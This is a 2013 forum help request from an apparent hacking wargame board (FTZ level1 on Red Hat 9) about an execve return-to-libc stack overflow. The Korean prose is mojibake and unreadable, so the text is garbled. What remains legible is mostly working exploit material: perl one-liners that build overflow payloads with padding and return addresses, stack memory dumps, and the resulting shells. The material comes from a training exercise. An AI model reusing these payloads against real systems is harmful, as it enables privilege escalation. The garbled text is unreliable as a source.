|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1703 [º¹»ç]
±ÔÄ¢À» ¸ð¸£°Ú½À´Ï´Ù.
½ÇÇàȯ°æÀº redhat9.0 À̱¸¿ä.
execve(½ÇÇàÀÎÀÚ, Æ÷ÀÎÅÍ, NULL) ÀΰÍÀº ¾Æ´Âµ¥..
0x 08 04 90 14 ¿¡ ½Éº¼¸¯¸µÅ©¸¦ °Ç´ÙÀ½, ½©µû´Â ÁßÀε¥.
µµ´ëü ÀÛµ¿¿ø¸®¸¦ ¸ð¸£°Ú¾î¿ä ¤Ð¤Ð
0xbffffaa0 41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40 AAAAAAAAAAAA...@
0xbffffab0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffac0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 41 41 41 41 ...@...@...@AAAA
0xbffffad0 14 90 04 08 00 00 00 00 f4 fa ff bf e8 85 04 08
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x8, "AAAA", "\x14\x90\x04\x08"'`
¿©±â¼ Çѹø µûÁø°Åº¸¸é, µÎ¹ø¤Š ÀÎÀÚ ¾øÀÌ ¹Ù·Î ³ÎÀÌ ¿Íµµ µÇ´Â±¸³ª.. ¶ó°í »ý°¢Ç޴µ¥.
0xbffffa90 41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40 AAAAAAAAAAAA...@
0xbffffaa0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffab0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffac0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffad0 41 41 41 41 14 90 04 08 00 fa ff bf 00 00 00 00 AAAA............
0xbffffae0 02 00 00 00 d9 fb ff bf ........
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x13, "AAAA", "\x14\x90\x04\x08"'`
¿©±âº¸¸é, 2¹øÂ° ÀÎÀÚ ÀÖ¾î¾ß ÀÛµ¿µÇ°í ¤Ñ
0xbffffa80 41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40 AAAAAAAAAAAA...@
0xbffffa90 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffaa0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffab0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffac0 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ...@...@...@...@
0xbffffad0 41 41 41 41 14 90 04 08 00 fb ff bf 00 00 00 00 AAAA............
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x17, "AAAA", "\x14\x90\x04\x08"'`
À§¿¡µµ 2¹øÂ° ÀÎÀÚ ÀÖ¾î¾ß µÇ°í,
µµ´ëü ¿ø¸®¸¦ ¾Ë¼ö°¡ ¾ø³×¿ä..
3Àϰ ºÙÀâ°í ÀÖ½À´Ï´Ù.. Á» µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð
|
Hit : 4045 Date : 2013/08/08 05:38
|